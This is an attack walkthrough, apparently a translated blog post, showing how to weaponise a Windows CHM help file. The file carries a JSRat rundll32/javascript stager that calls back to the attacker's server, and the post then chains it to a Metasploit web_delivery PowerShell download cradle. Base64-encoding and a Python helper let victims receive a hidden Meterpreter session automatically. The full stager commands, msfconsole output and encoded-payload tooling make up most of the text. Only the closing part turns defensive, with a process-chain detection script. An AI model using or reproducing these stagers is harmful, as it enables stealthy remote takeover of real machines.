CHM + Jsbackdoor Bundled backdoor

Source: Internet
Author: User

Start the JSRat server in interactive mode:

```bash
python MyJSRat.py -i 192.168.1.101 -p 8080
```

Browsing to http://192.168.1.101:8080/wtf returns the client-side stager command:

```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
```

The command makes rundll32.exe run an inline javascript: URL through mshtml's RunHTMLApplication; the script fetches /connect from the JSRat server with WinHttpRequest and eval()s the response, and if the request fails it kills rundll32.exe so no stray process is left behind. After a number of tests, this command was successfully embedded in a CHM file with the following HTML code:

```html
<!DOCTYPE html>
```

After compiling the CHM, opening it yields the JSRat interactive shell.

In the shell, cmd /c followed by a command executes it directly but pops up a visible console window (the "black box"); run executes the command without showing one. Because run returns no output, redirect the output to a file, for example whoami > e:\1.txt, and then use read to fetch the file and obtain the result.

2. Get Meterpreter Session

This test obtains the Meterpreter session by having the client run a PowerShell command: once the client's JS interactive shell is in hand, the PowerShell stager is executed automatically and calls back to Metasploit. Here is how.

Start the Metasploit web_delivery module:

```
~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set srvport 8081
srvport => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```

Any client with PowerShell can obtain a Meterpreter session by executing the following command:

```bash
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```

Because of the special characters in that command ($, quotes and semicolons, which get mangled when passed through a shell or another tool's argument), encode it as Base64 first. Save the script body (everything after -c) to power.txt:

```bash
$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
```

Then run:

```bash
cat power.txt | iconv --to-code UTF-16LE | base64
```

The iconv step is required because PowerShell's -enc expects the Base64 of the UTF-16LE encoding of the script, not of its UTF-8 bytes. With GNU coreutils, add -w 0 to base64 so the output is not wrapped at 76 columns, which would otherwise break the one-liner.

The final PowerShell command to execute is:

```bash
powershell -ep bypass -enc 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
```

To get a Meterpreter session directly, use MyJSRat's execute-command mode (-c), which runs the supplied command on the client as soon as it connects:

```bash
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc 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"
```
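The steps above (take the web_delivery one-liner, save its body, convert it to UTF-16LE, Base64-encode it, and hand the result to MyJSRat -c) can be scripted and, more importantly, checked before use. The following Python is an added example and is not code from the original post or from MyJSRat; the hosts and ports are the ones used in the write-up, the function names are the example's own, and the encoder reproduces what PowerShell's -EncodedCommand expects (Base64 over UTF-16LE) so the result can be verified by decoding it again.

```python
import base64

# Values taken from the write-up; change them for your own lab.
LHOST = "192.168.1.101"     # Metasploit handler / web_delivery listener
SRVPORT = 8081              # web_delivery SRVPORT
JSRAT_HOST, JSRAT_PORT = "192.168.1.101", 8080


def web_delivery_stager(lhost, srvport):
    """Rebuild the PowerShell body that web_delivery (target 2, PSH) prints.

    This is the text after 'powershell.exe -nop -w hidden -c', i.e. exactly
    what the write-up saves to power.txt. Straight single quotes matter: the
    curly quotes that word processors produce are not PowerShell quotes.
    """
    return (
        "$n=new-object net.webclient;"
        "$n.proxy=[Net.WebRequest]::GetSystemWebProxy();"
        "$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
        f"IEX $n.downloadstring('http://{lhost}:{srvport}/');"
    )


def encode_command(script):
    """Encode a script for 'powershell -EncodedCommand' (-enc).

    PowerShell decodes the argument as Base64 of the UTF-16LE bytes, which is
    what 'iconv --to-code UTF-16LE | base64' produces. Unlike 'cat power.txt'
    this picks up no trailing newline, and unlike a wrapping base64 it never
    splits the output across lines.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(enc):
    """Inverse of encode_command; used to check a payload before shipping it."""
    return base64.b64decode(enc).decode("utf-16-le")


def powershell_encoded_line(script):
    """The command the JSRat client will run."""
    return f"powershell -ep bypass -enc {encode_command(script)}"


def myjsrat_execute_line(host, port, script):
    """The MyJSRat.py invocation in execute-command mode.

    Encoding is what makes this safely quotable: the raw one-liner contains $,
    quotes and semicolons that the shell and the -c argument would mangle,
    whereas the Base64 form is only [A-Za-z0-9+/=].
    """
    return f'python MyJSRat.py -i {host} -p {port} -c "{powershell_encoded_line(script)}"'


if __name__ == "__main__":
    stager = web_delivery_stager(LHOST, SRVPORT)
    enc = encode_command(stager)
    assert decode_command(enc) == stager          # round trip before using it
    print(powershell_encoded_line(stager))
    print(myjsrat_execute_line(JSRAT_HOST, JSRAT_PORT, stager))
```

The round trip is the part worth keeping: encoding the UTF-8 bytes instead of UTF-16LE yields a string PowerShell accepts but decodes to nonsense, and with -w hidden the resulting error is never seen, which is the usual reason a hand-built -enc payload does nothing.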

During the test, from opening the CHM to receiving the Meterpreter session, nothing unusual is visible on the client: no console window pops up, and the Meterpreter session arrives.

So far I have not found a real defensive measure; readers who know one are welcome to share. The best defence remains awareness: treat documents of this kind with care, do not open them casually, and if one must be opened, open it inside a virtual machine. With Procexp.exe you can see that a backdoored CHM spawns a new process: the HTML Help viewer (hh.exe) starts the rundll32.exe stager, which is not something a help file normally does.
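The process chain just described (hh.exe opening the CHM, the CHM launching rundll32.exe with the javascript: stager, JSRat then launching powershell.exe with an -enc payload) is exactly what a detection can key on. The following Python is an added example and not part of the original post; it runs three such rules over constructed Sysmon-style process-creation events (made up for this example, using the stager command lines from the write-up) and decodes the -enc payload to look for a download cradle. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the rule names and helper functions are the example's own.

```python
import base64
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# They are made up for this example and model the chain the write-up produces:
# hh.exe opens the CHM, the CHM starts rundll32.exe with the JSRat stager, and
# JSRat's JavaScript starts powershell.exe with an -enc payload. The last event
# is an ordinary rundll32.exe use and must not be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" E:\docs\manual.chm'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": (r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
                     r'document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                     r'h.Open("GET","http://192.168.1.101:8080/connect",false);'
                     r'try{h.Send();b=h.ResponseText;eval(b);}catch(e){}')},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "powershell -ep bypass -enc " + base64.b64encode(
         "$n=new-object net.webclient;IEX $n.downloadstring('http://192.168.1.101:8081/');"
         .encode("utf-16-le")).decode("ascii")},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Interpreters that have no business being children of the HTML Help viewer.
SUSPICIOUS_HH_CHILDREN = {"rundll32.exe", "powershell.exe", "cmd.exe", "mshta.exe",
                          "wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or None.

    PowerShell decodes the argument as Base64 of UTF-16LE, so we do the same;
    anything that does not decode cleanly is treated as 'no payload'.
    """
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event):
    """Apply the three rules to one event and return a list of finding strings."""
    findings = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]

    # Rule 1: the CHM viewer spawned an interpreter (what Procexp shows).
    if parent == "hh.exe" and image in SUSPICIOUS_HH_CHILDREN:
        findings.append(f"hh.exe spawned {image}: CHM file launched a process")

    # Rule 2: the JSRat-style rundll32 stager, whoever the parent is.
    if image == "rundll32.exe" and re.search(r"javascript:|RunHTMLApplication", cmd, re.I):
        findings.append("rundll32.exe running an inline javascript: URL via RunHTMLApplication")

    # Rule 3: an encoded PowerShell command that decodes to a download cradle.
    if image == "powershell.exe":
        script = decode_encoded_command(cmd)
        if script is not None:
            low = script.lower()
            if "downloadstring" in low or "iex" in low or "invoke-expression" in low:
                findings.append("powershell -enc decodes to a download-and-execute cradle: "
                                + script[:60])
    return findings


def scan(events):
    """Run analyse() over a list of events; returns (image, finding) pairs."""
    return [(basename(e["Image"]), f) for e in events for f in analyse(e)]


if __name__ == "__main__":
    for image, finding in scan(SAMPLE_EVENTS):
        print(f"[{image}] {finding}")
```

Rule 1 is the one that survives changes to the payload: whatever the CHM launches, it is hh.exe that launches it, and a help viewer spawning rundll32.exe or powershell.exe is rare enough in normal use to alert on directly.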
